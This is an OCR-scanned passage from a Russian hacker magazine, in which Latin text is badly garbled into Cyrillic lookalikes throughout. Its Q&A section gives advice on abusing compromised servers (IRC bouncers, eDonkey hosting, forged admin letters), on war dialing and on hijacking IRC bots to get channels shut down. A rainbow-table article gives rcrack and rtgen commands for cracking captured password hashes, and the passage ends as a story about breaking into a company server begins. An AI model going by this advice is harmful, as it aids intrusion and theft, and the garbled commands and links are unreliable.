О: Что делает зараза ЗтіЙгаисІ? 

А: Конечно, масштабы эпидемии были значительно скромнее 
МуОоот'овской или новомодной — 2оЮЬ'овской. Часть названия 
виря — слово Ігаиб — обозначает «мошенничество». Так что этот 
червь пытается прокрутить самые разнообразные пакости с твоим 
компом. Перво-наперво зараза блокирует настройки экрана, чтобы 
ты не смог снять вписываемую на десктоп рекламу. Г енерится море 
поп-апов, меняется стартовая страница ІЕ и реализуются все прочие 
таіѵѵаге- радости. В лечении помогает маленькая утилита НуаскТЫз, 
которую легко можно отыскать на просторах веба. Более подробно 
об этом и других паразитах, ты сможешь прочесть в Зесигііу 
Везропзе ( тѵм.зутапіес.сот/аѵсепіег/ѵіпІосІЬ.ЫтІ ) Зутапіес'а. 

О: Что такое ВМС? 

А: Лет 5-6 назад — мегамодная тема. Это сокращение от Ьоипсег, 
прокси для использования на ІВС. Ты ставишь эту маленькую *піх- 
программку (хотя есть и ѵѵіп, но они не очень популярны) на удален- 
ный сервер, где она открывает определенный порт, куда потом под- 
рубаешься ты сам. Там ты выбираешь нужный ІВС-сервер, с кото- 
рым проксик будет держать контакт. Основная фишка — аноним- 
ность, в Сети ты появляешься уже с хостом удаленного сервера. Осо- 
бым хакерским шиком считались появления в Сети с хостов похакан- 
ных организаций, особенно тех, что сидят в доменах .тіі и .доѵ :). Бы- 
вали и просто прикольные хосты, вроде засггіісез.ѵігдіпз.іо.іііееѵіі.пеі, 
на котором я сам сидел три года назад. Есть еще и специальные 
фишки — возможность держать коннект, когда тебя самого нет в Се- 
ти. Бывало весело свалить из Сети, оставив свой аѵѵау-ник, а потом 
видеть в ѵѵПоіз із аѵѵау 12 сіауз :). Также баунсерами можно сгребать 
варез: у некоторых из них, вроде рзуВІМС, есть опция перехвата ЭСС- 
потоков, когда весь соответствующий трафик ложится на сервер. 
Так, скажем, проксик стоит у провайдера в твоему городе, куда ты 
ходишь раз в неделю списать свежие мувики к себе на ноут. Вполне 
понятно, что для установки Ьпс нужен рабочий зііеіі-аккаунт. 

О: Как хакеры используют переходники СОМ2ІР? 

А: Имеются в виду не механические переходники, а специальный 
софт, который позволит раскрыть твой (возможно, и чужой :)) СОМ- 
порт (В5-232) для доступа из Сети. Теперь любой девайс, подклю- 
ченный к серийному порту, окажется виден из инета. В мирных це- 
лях это используется для удаленного использования разнообразных 
девайсов, которые до сих пор висят на доисторическом сот-порте, 
вроде считывателей штрих-кодов, кассовых аппаратов и весов. Ха- 
керы же и по сей день используют данную уловку для создания біаі- 
оій'ов, то есть сетевых точек, откуда можно использовать удален- 
ные модемы. Те, в свою очередь, могут быть использованы для ѵѵаг 
біаііпд'а, не столь актуального как прежде, но все еще востребован- 
ного отдельными теневыми элементами. ОіаІ-оиі'ы полезны и для 
поднятия уровня анонимности. Большая часть софтин-конверторов, 
вроде В5232 Іо ТСР/ІР СопѵеПег 3.0 ( тм. іаІІесЬ . сот/ргобисіз/іср- 
сот.ЫтІ), умеют также создавать виртуальные ком-порты, которые 
уже линкуются с СОМ-девайсами на удаленном компе через ТСР/ІР. 
В настройках «Удаленного соединения» ты указываешь «Стандарт- 
ный модем» установленный на том порту. Отдельная софтина име- 
ет еще больше настроек по теме виртуальных портов — Ѵ5Р0 
Мападег ( уѵуѵуѵ. ИЬЬо . сот/ІсІзі_ѵзртап .рЬр) . 

О: Так, а в чем суть ѵѵаг сііаііпд'а? Живо ли это сейчас? 

А: Как было сказано в предыдущем вопросе, тема несколько поте- 
ряла свою актуальность, но 10 — 20 лет назад активно юзалась хаке- 
рами. Если ты помнишь фильм ѴѴаг Оатез, то там юный хакер зах- 
ватил Пентагон, осуществив прозвон по серии номеров ѵѵаг біаіег'ом. 
В корпоративных сетях порой находилось много модемных пулов, 
где можно было подрубиться к сети без авторизации или путем вво- 
да неких дефолтовых комбинаций, вроде абтіп:асІтіп. Если атака 
осуществлялась наугад, без точно намеченной мишени, прозвон 
мог занять много дней и недель. Тупым перебором номеров выявля- 
лись места дислокации модемов отдельных фирм и учреждений. В 
старые времена, когда Инет был доступен только различным НИИ и 
военным, общительные компьютерщики отыскивали ѵѵаг сііаіег'ами 
дружеские ВВЗ'ки. В X №6 за 2000 год (лежит на ѵѵтѵ. хакер. ги) есть 
большой обзор различных софтин представленного семейства. 



Будь готов, что многие из них станут работать лишь под МЗ-ЭОЗ'ом 
:). Однажды я наблюдал очень красивый взлом, когда был захвачен 
сервер конторы, где был установлен *піх-диалер, работавший с де- 
сятком модемов конторы одновременно. Таким образом, используя 
тональный набор и имея указанный десяток модемов, достигалась 
довольно высокая скорость перебора номеров. Отдельные люди 
расставляли подобные штуки в разных городах, собирая информа- 
цию из нескольких стран одновременно. 

О: В который раз не могу найти крэк к последней версии софти- 
ны. Где брать свежую крэкву? 

А: Обыкновенно, лекарства для поп-софта, работ массового ха- 
рактера, вроде ТИе Ваі! и М3 ОІІісе, выходят в свет сразу, минуя 
ргіѵаіе-этап, когда решение оказывается доступно лишь избран- 
ным. Однако крэкеры частенько запаздывают, не укладываясь да- 
же в сроки. При подобных раскладах те, кому жаль отдавать свои 
кровные, идут немного другим путем — стараются установить бо- 
лее старую версию программы, для которой существует лекар- 
ство. Тем более, что обычно обновление с 1.31 до 1.32 не несет в 
себе чего-то кардинального (случаи серьезных багов — не в счет), 
так что пользователи более ранних версий не очень-то обламыва- 
ются. По этой причине на официальных сайтах коммерческого 
софта ты никогда не встретишь ссылок на ранние версии продук- 
та. Скачать устаревшие программы можно на любом из боѵѵпіоасі- 
сайтов, вроде іисоѵѵз.сот, которые еще не успели обновить вер- 
сию софтины. 

О: Файрвол уже надоел спрашивать разрешения на соединения мое- 
го Интернет-пейджера. Можно его как-то сделать менее голосистым? 

А: Самое простое, но и самое неосторожное решение — вообще 
отрубить ТігеѵѵаІІ. Более грамотным будет выбор опции, вроде 
АІІоѵѵ аІІ асііѵШез Іог Лііз арріісаііоп, когда будет дан зеленый свет 
отдельной софтине на все возможные соединения по инету. С по- 
добным я накололся лишь однажды, доверив все соединения для 
локального ЗМТР-сервера, когда пара лиходеев извне успели 
немного поспамить с моего хоста. Здесь надо было разрешить 
все виды соединений для софтины, но лишь с ІосаІПозІ и пары 
избранных адресов в локалке. Также, отдавая подобную свободу 
софту, помни о защите от умных троянских коней, которые умеют 
инжектировать свой код во внешние процессы. 

О: Порутал недавно два сервера. Думаю вот, стоит ли поднять там 
е-Эопкеу сервис? Если да, то какой? 

А: Все зависит от серьезности намерений. Если просто хочется по- 
чувствовать себя отцом на несколько дней, то это может быть и ре- 
шением. Подобный сервер создает немаленький трафик, который 
вряд ли окажется незамечен настоящими админами. Если предосте- 
режение кажется неактуальным, и админы вместо работы сосут ла- 
пу 24/7, то есть несколько рабочих серверов. Также стоит помнить, 
что не все хабы еЭопкеу возьмут к себе сервант без письма от глав- 
ного администратора Сети, где будет расположено линкуемое доб- 
ро. Конечно, особо отчаянные люди смогу написать подобное пись- 
мо и послать от имени начальника, но что делать, когда е-Оопкеу'ев- 
цы будут звонить этому админу? В любом случае, к рассмотрению 
предлагается Озегѵег — самое популярное решение Сети, доступ- 
ное на ІидсІипит2к.{гее1г. В X №10 за 2004 я рассказывал все дета- 
ли настройки этого продукта в запрещенной ныне рубрике І_еесІі. 

О: Как устраивают провокации по закрытию I ВС-каналов? 

А: Как подставляют людей, сдают их чекистам? Да, находят у них ог- 
нестрельное оружие и наркотики. ІВС-каналы закрывают после ус- 
тановления незаконных действий со стороны его администрации. 
Расскажу про закрытие одного чана сервисной сети. Канал был 
большой и известный, липа, вроде написания арбузов (аЬизе), на 
операторов не катила, нужно было создать более серьезный преце- 
дент. Тогда злопыхатели взялись за разработку ботов канала. Най- 
дя пару багов в сети, где был залит один из них, негодяи захватили 
бот-сервант. Теперь еддбгор, который был прописан в ЗОР'ах (люди 
стоящие над обычными операторами), оказался под полным контро- 
лем вредителей. Те, недолго думая, снарядили ботву кучей спам- 
скриптов, стали гонять ботягу по сотням других каналов, приглашая 
на свой родной (іпѵііе-спам). Тут уже было о чем писать донос, что и 
поспешили сделать хозяева других каналов. Сервер-опы (отцы Се- 
ти, которые оказываются уровнем выше иркопов) пришли на канал, 
стали задавать вопросы. Вредители просекли, кто взялся за реше- 
ние вопроса, и начали рекламировать канал там, где сидели сервер- 
операторы. На следующий день #сИаппеІ был заморожен @ 
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Радуга в таблицах 



В СОВРЕМЕННЫХ СИСТЕМАХ АУТЕНТИФИКАЦИИ 
ОГРОМНУЮ РОЛЬ ИГРАЮТ ХЭШ-ФУНКЦИИ — СПЕ- 
ЦИАЛЬНЫЕ ОТОБРАЖЕНИЯ, КОТОРЫЕ ПО ПЕРЕДАН- 
НОЙ ИМ СТРОКЕ ГЕНЕРИРУЮТ НЕКОТОРУЮ СИГНАТУ- 
РУ, ОТПЕЧАТОК, ИЛИ ШИФРУЮТ ЭТУ СТРОКУ. НА 
СТРАНИЦАХ НАШЕГО ЖУРНАЛА МЫ НЕ РАЗ СТАЛКИ- 
ВАЛИСЬ С ПРОБЛЕМОЙ, КОГДА НУЖНО БЫЛО ПРОВЕ- 
СТИ ОБРАТНУЮ ОПЕРАЦИЮ: ПО ИЗВЕСТНОМУ ЗНАЧЕ- 
НИЮ ХЭШ-ФУНКЦИИ ВОССТАНОВИТЬ СТРОКУ-ОРИГИ- 



НАЛ. ТАКОГО РОДА ЗАДАЧИ ВОЗНИКАЮТ ДОВОЛЬНО 
ЧАСТО. ЕСЛИ ХОЧЕШЬ УЗНАТЬ ПОЛЬЗОВАТЕЛЬСКИЙ 
ПАРОЛЬ ВО ВЗЛОМАННОЙ СИСТЕМЕ, ПОДКЛЮЧИТЬ- 
СЯ К ЧУЖОМУ ѴРЫ-СЕРВЕРУ, ТО ТЕБЕ ПРИДЕТСЯ 
ЛОМАТЬ ЗАХВАЧЕННЫЙ ХЭШ. СЕГОДНЯ МЫ ПОГОВО- 
РИМ О НАИБОЛЕЕ СОВРЕМЕННОМ И ПРОГРЕССИВ- 
НОМ ПОДХОДЕ К РЕШЕНИЮ ЭТОЙ ПРОБЛЕМЫ, КО- 
ТОРЫЙ ПОЗВОЛЯЕТ РАЗДРАКОНИВАТЬ ХЭШИ ЗА 

СЧИТАННЫЕ ЧАСЫ I Никита Кислицин (пікіІ 02 @геаІ. хакер. ш) 



Использование гаіпЬоѵѵ ІаЫез для 
сверхбыстрого взлома хэшей 

[начало] В большинстве систем пользовательские пароли не хранятся в 
открытом виде, размещаются только лишь соответствующие им значения 
хэш-функций. При этом возникает такая ситуация, что даже сама система 
не знает пользовательского пароля: она располагает лишь его отпечатком 
и при аутентификации сравнивает хэш переданной пользователем строки 
с тем, что хранится внутри системы. Таким образом, даже если взломщи- 
ку удается захватить хэши пользовательских паролей, обычно ему не 
удается использовать эти значения для своих темных делишек. 

К сожалению, сейчас многие проекты страдают довольно странной, на 
мой взгляд, вещью: они сами предоставляют интерфейс для аутентифи- 
кации через хэш-пароль, обращая в маразм всю эту затею с шифрова- 
нием. За примерами далеко ходить не надо: куча ѵѵеЬ-форумов, которые 
хранят в пользовательских соокіез зашифрованные пароли и осущест- 
вляют аутентификацию по этим значениям. 

Если же аутентификация по хэш-паролю невозможна, перед взломщи- 
ком встает серьезная проблема: нужно каким-то способом получить ис- 
ходную строку по известному хэшу. Строго говоря, решение этой зада- 
чи не единственное: нельзя исключать ситуацию, при которой двум раз- 
личным строкам будет соответствовать одно и тоже значение хэш-функ- 
ции. Именно по этой причине правильно говорить, что взлом хэша — это 
поиск коллизии, а не исходной строки. Ведь если одному значению хэ- 
ша соответствуют строки ЧкІсІзЩѵк» и «ОкІфкѵІсІІіІЬсШіЫ», невозможно 
знать наверняка, какую из них загадал пользователь Петя. 

Каким же образом возможно найти коллизию? Самый простой вариант, 
который приходит в голову — тупой перебор всех возможных значений. 
Генерируется множество всех допустимых значений строк-оригиналов, бе- 



рется первый элемент, для него генерируется хэш, сравнивается с извест- 
ным. Если значения совпадают, процесс закончен и коллизия найдена. 
Если не совпадают, берется следующий элемент. И так до тех пор, пока не 
обнаружится коллизия, либо не закончится множество претендентов. 

К сожалению, такой подход не может обеспечить хорошей произво- 
дительности. Дело в том, что процесс перебора занимает разумное 
время только в том случае, если множество вариантов не слишком 
велико. Перебор всех возможных строк длиной в 10 символов — это 
уже неземная задача для РС-хакера. Именно по этой причине люди 
стали искать пути к тому, чтобы оптимизировать процесс поиска кол- 
лизий. И что ты думаешь, нашли. 

[новый метод] Все началось чуть раньше, чем ты предполагал. Еще 
в 1980 году Мартин Хеллман предложил кардинально новый подход к 
криптоанализу хэш-функций: он предложил использовать предвари- 
тельно вычисленные таблицы, размещенные в памяти. Однако совер- 
шенно понятно, что хранить хэш-значения всех возможных вариантов 
ключей — абсурдная затея, которая ни к чему хорошему не приведет. 
Мало того, что такие таблицы будут занимать умопомрачительное коли- 
чество терабайт, так еще и поиск по ним будет занимать невероятное 
количество времени. 

Хеллман предложил довольно оригинальную концепцию, которая осно- 
вывается на разбиении исходного множества ключей на набор подмно- 
жеств. На практике это делается следующим образом: 

Щ Фиксируется рабочий алфавит, то есть задается множество О всех 
возможных ключей. 

\ 2 \ Фиксируется элемент ц из множества О, и вычисляется значение И 
хэш-функции на нем. 









вероятностная поверхность, кото- 
рая дает представление о том, 
как надо выбирать параметры 




В статье рассматривалась, 
разумеется, приближенная 
модель, на практике все 
численные характеристики 
могут серьезно отличаться 
от прогнозируемых. Это 
особенно касается времени 
поиска: тут все зависит от 
объема оперативной памя- 
ти, поскольку активный 
свопинг не по-детски тор- 
мозит процесс. 



[з] При помощи некоторой «срезаю- 
щей» функции В из хэша генериру- 
ется ключ, принадлежащий множе- 
ству О: ц=В(Іі). Если число элемен- 
тов в цепочке меньше заданного, то 
осуществляется переход к пункту 2. 




Сервисы по взлому хэшей: 
ШрУ/раззсгаскіпд.сот, 
Шр://загсарг]шу- 
геііі.еи.огд. Интересные до- 
кументы для чтения: 
шшш.апізідііі.сот/ізі/гаіп- 
Ьо тгаск/гсгаскЫогіаІЫт, 
Шр://Іаз- 

есшшш.ерй.сй/риЬ/Іаз- 
ес/бос/ОесйОЗ.рсН, 
Шр://сгуріодгарІіу.Ііурег- 
Ііпк. сг/тб5/ІѴЮ5_соІІі- 
зіопз.рМ. 



Такой итеративный процесс вы- 
полняется до тех пор, пока мы не 
получим цепочку длиной I ключей. 

Эта последовательность не разме- 
щается целиком в памяти, записы- 
вается лишь первый и последний 
ее элементы. В этом и заключает- 
ся суть метода: если в цепочке, скажем, 1500 ключей, то мы неслабо эко- 
номим памяти, обменивая ее на время, необходимое для дальнейшего 
криптоанализа. К слову, в исходном варианте название этого метода пе- 
реводится как «компромисс между затратами времени и памяти в крип- 
тоанализе», так что все логично. Но вернемся к описанию метода. 

При помощи описанного алгоритма генерируется определенное количе- 
ство цепочек, которые можно удобно представить в виде двумерного 
массива, или таблицы с двумя колонками, в первой из которых находит- 
ся начальный ключ цепочки, а во второй — конечный. После того как це- 
почки сгенерированны, можно уже осуществлять в них поиск ключа. Ре- 
ализуется это следующим образом. 

Задается значение хэш-функции, для которого необходимо получить 
коллизию. При помощи срезающей функции В строится значение клю- 
ча КО, из которого выводится по описанному алгоритму цепочка поис- 
ка длиной не более чем I элементов. Если в таблице есть искомый 
ключ, то один из сгенерированных элементов новой цепочки будет яв- 
ляться терминальным элементом нашей таблицы. Далее не соста- 
вляет труда по известному начальному элементу вывести всю соот- 



ветствующую терми- 
налу цепочку, вклю- 
чая элемент, непо- 
средственно пред- 
шествующий началь- 
ному значению КО, то 
есть ключ, который 
мы ищем. Однако та- 
кой позитивный ра- 
склад возможен толь- 
ко в том случае, если в 
сгенерированных та- 
блицах действительно 
есть коллизия. Здесь 
вплотную встает ре- 
зонный вопрос: сколь- 
ко же нужно сгенери- 
ровать цепочек, что- 
бы они покрывали все множество возможных ключей. И к сожалению, 
дать односложный ответ невозможно. 

[липкая дрянь] Дело в том, что не исключен вариант, при котором це- 
почки, начинающиеся с различных ключей, будут иметь одинаковые эле- 
менты и будут «слипаться» после определенной позиции. Это происхо- 
дит из-за природы срезающей функции: ведь она отображает более 
мощное множество в менее мощное. Понятно, что во множестве хэшей 
возможных элементов значительно больше, чем во множестве ключей. 
По этой причине нескольким хэшам соответствует только один ключ. 
Если у тебя проблемы с воображением, на соответствующем рисунке 
можно увидеть наглядную иллюстрацию. 

А я пока продолжу отвечать на вопрос о количестве цепочек. Вообще го- 
воря, чтобы обеспечить полное покрытие множества О, необходимо сге- 
нерировать бесконечно большую таблицу с цепочками. Дело в том, что 
частота слипания цепей быстро увеличивается вместе с ростом табли- 
цы. Поэтому число требуемых последовательностей характеризуется 
требуемой вероятностью (обозначу ее как Р*) того, что произвольный 
ключ ц из О окажется в нашей системе подмножеств, в нашей таблице. 
Именно требуемая вероятность Р* определяет необходимый размер та- 
блицы с цепочками. Обрати внимание, что под «размером» таблицы я 
понимаю как число цепочек, так и их длину, оба эти параметра влияют 
на частоту слипания и эффективность покрытия. 

В работе Хеллмана строго выводится формула, по которой можно вычи- 
слить Р* как функцию от числа цепочек, их длины и числа элементов во 
множестве О. Это довольно здоровое выражение, и само по себе нас 
мало интересует, нас больше заботит, что оно показывает. Собственно, 
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генерирование цепочек в рабочем режиме 



ничего кардинально нового: при росте размеров таблицы вероятность 
Р* практически перестает увеличиваться. По этой причине для эффек- 
тивного использования метода необходимо создавать несколько та- 
блиц, сгенерированных независимым образом. В этом случае общая ве- 
роятность успеха (Р) выражается так: Р=1-(1-Р*) Л І, I — число таблиц. Эту 
формулу очень легко получить из простейших соображений: (1-Р*) — 
это вероятность того, что мы не найдем ключ в одной из таблиц; (1-Р*) Л І 
— вероятность, что вообще не найдем ключ ни в одной из I таблиц. Со- 
ответственно, вероятность обратного события — это Р=1-(1-Р*) Л І. 
Следует отметить, что эта формула верна лишь в том случае, если обес- 
печена независимость генерации таблиц, то есть для каждой таблицы 
выбрана собственная, уникальная срезающая функция Р. 



внутри файла 
с описаниями 
хэш-функций 




этот скрипт для Маріе поможет 
тебе поэкспериментировать 



[конкретные вещи] Думаю, то, что я рас- 
сказал тебе, будет достаточно для понимания 
более практических вещей. Давай познако- 
мимся с конкретным софтом, научимся с ним 
работать и, вообще, понюхаем эти радуги в 
таблицах. На самом деле, в Сети не так уж и 
много информации о гаіпЬоѵѵ ІаЫез: если ты 
поищешь инфу в гугле, то, по существу, уви- 
дишь только одну содержательную ссылку — 
шшѵѵ.апІзідІіІ.сот/гзІ/гаіпЬоѵѵсгаск. Однако 
смею тебя заверить, ее нам будет предоста- 
точно! Это сайт проекта с говорящим названи- 
ем ВаіпЬоѵѵСгаск, главная ценность которого 
находится в разделе Ооѵѵпіоасіз. Там предла- 
гается скачать софтину, с помощью которой 
можно генерировать цепочки ключей, и взла- 
мывать при помощи уже созданных таблиц 
конкретные хэши. Софтина поста- 
вляется в том числе и в исходных 
кодах, так что при наличии у тебя 
желания и необходимого опыта 
можно будет ознакомиться с кон- 
кретной реализацией всего того, 
о чем мы говорили выше. Мы же в 
этой статье просто научимся 
пользоваться этой программой 
для генерации гаіпЬоѵѵ-таблиц и 
взлома хэшей. Под РгееВЗЭ со- 
брать эту программу у меня не по- 
лучилось, и поэтому я решил все 



эксперименты проводить на вин- 
довой машине — благо на сайте 
лежит уже готовый бинарник, и 
париться с компиляцией не нуж- 
но. Последняя версия системы — 
1.2, она поддерживает работу с 
хэшами І_апМападег, тсІ5, зііаі, а 
также позволяет пользователю 
легко прикручивать к программе 
свои собственные алгоритмы, ко- 
торых нет в базовом списке. 
Скачав с сайта архив с бинарника- 
ми, ты найдешь внутри несколько 
бинарных файлов. Нас сейчас 
больше всех интересует Ддеп — именно эта программа генерирует це- 
почки символов. Для запуска софтины необходимо указать все требуе- 
мые параметры таким образом: 

Ддеп Іт аірііа 1 7 0 2100 8000000 аІІ 

Здесь Іт — это имя хэш-функции, аІрИа — это допустимые в ключе 
символы, в данном случае просто латинские буквы (АВСОЕ- 
РОНІЖІМЫОРОВ5ТІІѴѴѴХѴ2). 1 и 7 — это минимальная и макси- 
мальная длина ключа, 0 — идентификатор таблицы, 2100 — длина 
каждой цепочки, а 8000000 — количество цепочек. Вполне резонный 
вопрос: почему указаны именно такие числа, а не другие. В нашем 
случае для этой конфигурации такие настройки оптимальны, они 
обеспечивают приемлемое время генерации, поиска и объем зани- 
маемой памяти. Поиск таких оптимальных значений для различных 
конфигураций — штука непростая, но мы с тобой сейчас научимся 
этому искусству. Тем более, что у нас для этого все есть. 

[анализ параметров] Прежде всего необходимо определить, какие 
параметры мы можем подкручивать, и на что это влияет. Совершенно 
очевидно, что потребительские параметры (вероятность успеха, объем 
занимаемой памяти и время поиска) зависят от длины цепочек I, их ко- 
личества т и числа используемых таблиц I. Мы знаем, как выражаются 
через эти параметры вероятность Р, но ничего пока не говорили о том, 
как от них зависят время поиска Т и объем таблиц М. С размером та- 
блиц все просто, каждая цепочка описывается такой вот структурой: 

зішсі ВаіпЬоѵѵСііаіп { 
иіп164 пІпсІехЗ; 
иіпШ4 пІпсІехЕ; 

}; 




Поэтому общий объем таблицы из т цепочек составляет 16*т. Соответ- 
ственно, если таблица всего одна, то они занимают 1 6*т*І байт. 

Что касается времени поиска хэша, то оно выражается так: П/(2*зреесІ), 
где зрееб — это скорость вычисления хэшей. 

Теперь можно наложить некоторые ограничения на эти параметры, на- 
пример, чтобы время поиска оригинала для тсІ5-хэша было не больше 
7000 секунд, и при этом места под таблицы требовалось не больше 
10 Гб. Теоретически, по этим сведениям можно задать область, в кото- 
рой удовлетворяются все наложенные ограничения. На практике же 
возникает проблема с численным расчетом вероятностной поверхности. 

Дело в том, что вероятность обнаружения хэша в одной таблице выража- 
ется как 1-П(1-т[і]/І\І), где П — произведение по і от 1 до I, длины цепоч- 
ки; т[і] — число новых элементов в і-ой цепочке. Числа т[і] вычисляются 
итеративно, каждое последующее значение зависит от предыдущего, и, в 
конечном итоге, все они зависят от начального. Сам понимаешь, что рас- 
чет такой конструкции и ее пересчет при изменении начального условия 
— задача очень трудоемкая, компьютер возится над ней долго. Рассчи- 



СПЛОИТ ОТ НОІІЗЕОРРАВІІЗ 
СЕРВИСЫ ПО ВЗЛОМУ ХЭШЕЙ 

В Интернете есть несколько энтузи- 
астов, предоставляющих бесплат- 
ные услуги по быстрой расшифров- 
ке хэшей. Эти ребята не пожалели 
системного времени, памяти и ме- 
ста на диске, чтобы предоставить 



возможность быстро ломать попу- 
лярные хэши. К примеру, тбб мож- 
но за несколько часов раздраконить 
на Мір://раззсгаскіпд.сот. Правда, с 
тех пор, как об этом сервисе напи- 
сали в зІазИсІоІ;, количество заявок, 
а значит, и время ожидания, много- 
кратно возросло. 



Если же тебе необходимо поломать 
І_М НАЗН, отправляйся на Мір://заг- 
сард.ѵѵаугеііі.еи.огд. 18750 мегабайт 
с таблицами сделают всю работу бы- 
стро и качественно. За время работы 
хозяин проекта потерял 1678875.57 
секунд машинного времени и помог 
раздраконить 5445 хэшей. 











тать, как меняется вероятность в зависимости 
от числа цепочек, их длины и количества та- 
блиц, даже с большим шагом, — все это зани- 
мает много времени. Да и построить график 
функции трех переменных — тоже задачка нар- 
команская. Поэтому для построения графика 
вероятности нужно по очереди фиксировать од- 
ну из переменных — ну, скажем, число таблиц. 
Понятно, что разумное число — что-то в районе 
трех-четырех-пяти. Если зафиксировать этот па- 
раметр, то уже можно построить вероятностную 
поверхность и судить об оптимальных параме- 
трах. На скрине неподалеку отсюда изображен 
пример такой поверхности, которую я построил 
в Маріе. Там отчетливо видно две оси — МЬ и I. 
МЬ — это объем таблиц в мегабайтах, I — длина 
цепочек. Сама поверхность отображает, как ме- 
няется вероятность по этим параметрам. Секу- 
щая плоскость соответствует вероятности 0.95. 
Соответственно, для выполнения этого условия 
тебе нужно выбирать все точки, лежащие над 
секущей плоскостью или прямо на линии пере- 
сечения поверхностей. При этом у тебя остается 
выбор, какому из параметров отдать приоритет 
— занимаемому на диске месту, или времени 
поиска. Тут следует еще отметить такой факт, 
что время поиска рассчитывается исходя из то- 
го, что вся текущая таблица находится в памяти 
компьютера, то есть время доступа очень мало 
по сравнению с вычислением хэш-функции. Это 
надо иметь в виду, на практике все может быть 
совершенно по-другому. Что же касается пара- 
метров, то, наверное лучше всего будет взять 
золотую середину — точку, где и место, и время 
«съедается» сравнительно мало. Она отмечена 
крестиком на графике. 

[используем таблицы] Итак, с выбором па- 
раметров для генерации таблиц мы разобра- 
лись. А так ли уж легко их сгенерировать? Ну 
нет, конечно, совсем нелегко, это опять занима- 
ет кучу времени. Ведь для построения цепочки 



из 2000 элементов нужно вычислить функцию 
столько же раз. На практике это может занимать 
сутки, недели и даже года. Однажды, проделав 
такую работу, сгенерированные таблицы можно 
будет выгодно сбыть или использовать для соб- 
ственных нужд. Разумеется, можно и не замора- 
чиваться над генерацией собственных таблиц, 
можно их просто купить за 500 долларов. 
Сейчас я расскажу о том, как использовать уже 
сгенерированные таблицы. Первым делом, для 
увеличения скорости поиска, их нужно пере- 
сортировать при помощи утилиты гІзоіТ, в каче- 
стве параметра ей нужно просто передать имя 
файла с таблицей. После этого уже можно за- 
пускать утилиту гсгаск, которая, собственно, и 
будет ломать твой хэш, отыскивая его в сгене- 
рированных ранее таблицах. Запускается 
гсгаск следующим образом: 

гсгаск *.гЫі 5сІ41 402аЬс4Ь2а76Ь971 9с191 1 01 7с592 

Вместо *.гі можно указать конкретные имена 
файлов с таблицами. Если же тебе нужно сло- 
мать целый файл с хэшами, просто укажи его 
имя после флага -I. 

[заключение] Ну вот и все, пожалуй, о чем я 
хотел тебе сегодня рассказать. Теперь ты хотя 
бы на пальцах знаешь, как работают эти табли- 
цы-радуги, какой есть софт для их создания, ис- 
пользования, и как с их помощью ломают хэши. 
А то ведь еще вчера об этом и понятия не имел, 
верно? Так что я сделал свою работу. Если заин- 
тересовался этой темой, то на диске лежит нес- 
колько оригинальных документов, набор необхо- 
димого софта и мой Маріе-скрипт для тестирова- 
ния параметров. Еще надо сказать, что некото- 
рые рассуждения я приводил в утрированном ви- 
де, и на самом деле, изложенная модель немно- 
го отличается от той, что используется в ВаіпЬоѵѵ 
Сгаск. Но так и должно быть — между теорией и 
практикой всегда есть небольшой зазор © 



КАК ПРИКРУТИТЬ СВОЮ ХЭШ-ФУНКЦИЮ 

Просто вопрос из РАО :). На самом деле, это актуальная проблема. Производи- 
тели включили в список поддерживаемых функций только три самых популяр- 
ных: тсІ5, Іт и зИаІ . Чтобы добавить какой-то другой алгоритм, нужно внести 
небольшие изменения в исходник ВаіпЬоѵѵСгаск. Открой файл НазІіВоіШпе.срр 
и добавь туда следующие строки: 

СНа$ііВои{іпе::СНа$ііВои{іпе() 

{ 

АсісІНаз[іРоиІіпе("оѵѵпПазІі", СооІНазМ, 16); 

} 



Прототип функции АсІсІНазІіВоіЛіпе: 

ѵоісі А00На50ВоиІіпе(5Ігіпд зНазИВоиІііпеЫате, НАЗНВ01ІТІІМЕ рНазОВоийпе, іпі пНазііІ_еп) 

Здесь зНазІіВоіШпеМате — название добавляемого алгоритма, причем, как пи- 
шут в документации, не следует использовать символ «_»; пНазІіІ_еп — длина 
генерируемого хэша; рНазІіВоіЛіпе — указатель на хэш-функцию: 

Іуресіеі ѵоісі (*НАЗНВ01ІТІЫЕ)(ипзідпесІ сііаг* рРІаіп, іпі пРІаіпІ_еп, ипзідпесі (Фаг* рНазИ); 

Тут рРІаіп — шифруемый текст, пРІаіпІ_еп — длина этой строки, а рНазІі — 
ссылка, куда записывается значение хэш-функции. Разумеется, необходимо 
также описать саму хэш-функцию — СооІНазІі — лучше всего это сделать ря- 
дом с остальными функциями в файле НазИАІдогШіпп.срр, разместив прото- 
тип в НазкіАІдогШіт.кі. 

После этого нужно пересобрать ВаіпЬоѵѵСгаск и попробовать добавленный алго- 
ритм в действии, вот так: 

Ддеп оѵѵпііазіі Іоѵѵегаірііа 1 7 0 100 16 Іезі 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВРШМ НЬЮСЫ 




Ночная 

бомбардировка 



НА ЧАСАХ 4 ЧАСА УТРА, ЗА ОКНОМ — ТЕМЕНЬ, ХОЛОД, 
И ЛЬЕТ ДОЖДЬ. НА МОНИТОРЕ МОРГАЕТ ЗНАЧОК ЗАГ- 
РУЖАЮЩЕЙСЯ ВИНДЫ, А В МОЕЙ НЕТРЕЗВОЙ ГОЛОВЕ 
ЗРЕЕТ ПЛАН НА ОСТАТОК НОЧИ: СОВЕРШЕННО ОПРЕ- 
ДЕЛЕННО, МНЕ ХОЧЕТСЯ РАЗМЯТЬ ПАЛЬЦЫ И ПОЛО- 
МАТЬ КАКОЙ-НИБУДЬ СТОЯЩИЙ СЕТЕВОЙ ПРОЕКТ. Я 
ЗАРЯДИЛ В БРАУЗЕР СВЕЖИЙ АНОНИМНЫЙ ПРОКСИ- 
СЕРВЕР И ОТПРАВИЛСЯ НА ПОИСКИ СВОЕЙ БУДУЩЕЙ 

ЖЕРТВЫ I _ _1 пШ0г_ (сІг.разсаІѲтаіІ.ги) 



Свирепая сетевая атака 

Перейдя по какому-то баннеру, я попал на железячный сайт и мое вни- 
мание на время переключилось на красивые устройства, один только 
взгляд на которые заряжал хай-тек позитивом. Я читал обзоры видео- 
карт, смотрел конфигурации системных плат и прикидывал цены, как 
внезапно в правом нижнем углу экрана что-то замигало — пришло сооб- 
щение от моего хорошего знакомого. Приятель просил помощи в одном 
непростом деле. Ему нужно было поломать сервер популярной компью- 
терной фирмы (ее название я оставлю в секрете), и упереть оттуда спря- 
танные от внешних глаз данные. Требуемые документы, как говорил мой 
знакомый, доступны только из локальной сети организации по ЗМВ и на- 
